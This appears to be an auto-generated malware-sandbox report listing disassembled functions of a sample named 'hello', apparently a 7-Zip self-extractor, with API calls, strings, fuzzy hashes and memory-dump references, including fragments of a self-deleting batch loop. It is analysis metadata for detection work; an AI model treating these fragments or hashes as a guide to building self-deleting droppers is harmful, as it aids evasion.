Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18

Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
wsprintfW.USER32 ref: 00401FFD
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
GetLastError.KERNEL32 ref: 00402017
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
GetLastError.KERNEL32 ref: 0040204C
lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
SetLastError.KERNEL32(00000000), ref: 00402098
lstrlenA.KERNEL32(00413FD0), ref: 004020CC
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
_wtol.MSVCRT ref: 0040212A
MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A

Strings

\3A, xrefs: 00401FDB
7zSfxString%d, xrefs: 00401FF7
XpA, xrefs: 00401FB4

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d$XpA$\3A
API String ID: 2117570002-3108448011
Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18

Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
LockResource.KERNEL32(00000000), ref: 00401C41
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
GetProcAddress.KERNEL32(00000000), ref: 00401C76
wsprintfW.USER32 ref: 00401C95
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
GetProcAddress.KERNEL32(00000000), ref: 00401CAD

Strings

SetProcessPreferredUILanguages, xrefs: 00401C58
%04X%c%04X%c, xrefs: 00401C8F
kernel32, xrefs: 00401C5D, 00401C62, 00401CA9
SetThreadPreferredUILanguages, xrefs: 00401CA4

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8

Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 0040779A
GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4

Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C

Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
GetWindow.USER32(?,00000005), ref: 00406D8F
GetWindow.USER32(00000000,00000002), ref: 00406DA5

Strings

\EA, xrefs: 00406D98
SetWindowTheme, xrefs: 00406D70
uxtheme, xrefs: 00406D5E

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: SetWindowTheme$\EA$uxtheme
API String ID: 324724604-1613512829
Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC

Function 0041022D Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84

Function 0041206B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0

Function 00411F91 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0

Function 0040D72E Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50

Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
CloseHandle.KERNEL32(004177C4), ref: 00404C40
SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2

Strings

7ZSfx%03x.cmd, xrefs: 00404B58
if exist ", xrefs: 00404BC7
" goto Repeat, xrefs: 00404BE0
:Repeat, xrefs: 00404B92
del ", xrefs: 00404B9F, 00404BA4, 00404BED
", xrefs: 00404BB9, 00404BBE, 00404C02
open, xrefs: 00404C63

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58

Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF

Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119

_wtol.MSVCRT ref: 004047DC
_wtol.MSVCRT ref: 004047F8

Strings

ExtractCancelText, xrefs: 004047A1
OverwriteMode, xrefs: 00404721
ExtractTitle, xrefs: 004046AF
ErrorTitle, xrefs: 0040467F
ExtractPathWidth, xrefs: 004047E5
Title, xrefs: 00404611
ExtractPathText, xrefs: 00404819
ExtractPathTitle, xrefs: 00404801
ExtractDialogText, xrefs: 004047AD
WarningTitle, xrefs: 00404697
MiscFlags, xrefs: 00404771, 00404776, 00404792
GUIMode, xrefs: 004046F4
CancelPrompt, xrefs: 00404831
|wA, xrefs: 0040464B
Progress, xrefs: 004046C7
ExtractDialogWidth, xrefs: 004047BE
GUIFlags, xrefs: 0040473E, 00404743, 0040475F

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
API String ID: 2725485552-3187639848
Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D

Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
GetWindowLongW.USER32(?,000000F0), ref: 00402DF3

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

Part of subcall function 00401A85: CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF

??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
GetParent.USER32(?), ref: 00402E2E
LoadLibraryA.KERNEL32(riched20), ref: 00402E42
GetMenu.USER32(?), ref: 00402E55
SetThreadLocale.KERNEL32(00000419), ref: 00402E62
CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
DestroyWindow.USER32(?), ref: 00402EA3
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
GetSysColor.USER32(0000000F), ref: 00402EBC
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02

Strings

STATIC, xrefs: 00402DDD
RichEdit20W, xrefs: 00402E8C
{\rtf, xrefs: 00402E09
riched20, xrefs: 00402E3D

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 1731037045-2281146334
Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68

Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00401CD4
GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
GetObjectW.GDI32(?,00000018,?), ref: 00401D28
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
CreateCompatibleDC.GDI32(?), ref: 00401D4B
CreateCompatibleDC.GDI32(?), ref: 00401D52
SelectObject.GDI32(00000000,?), ref: 00401D60
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
SelectObject.GDI32(00000000,00000000), ref: 00401D76
SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
SelectObject.GDI32(00000000,?), ref: 00401DB3
SelectObject.GDI32(00000000,?), ref: 00401DB9
DeleteDC.GDI32(00000000), ref: 00401DC2
DeleteDC.GDI32(00000000), ref: 00401DC5
ReleaseDC.USER32(00000000,?), ref: 00401DCC
ReleaseDC.USER32(00000000,?), ref: 00401DDB
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64

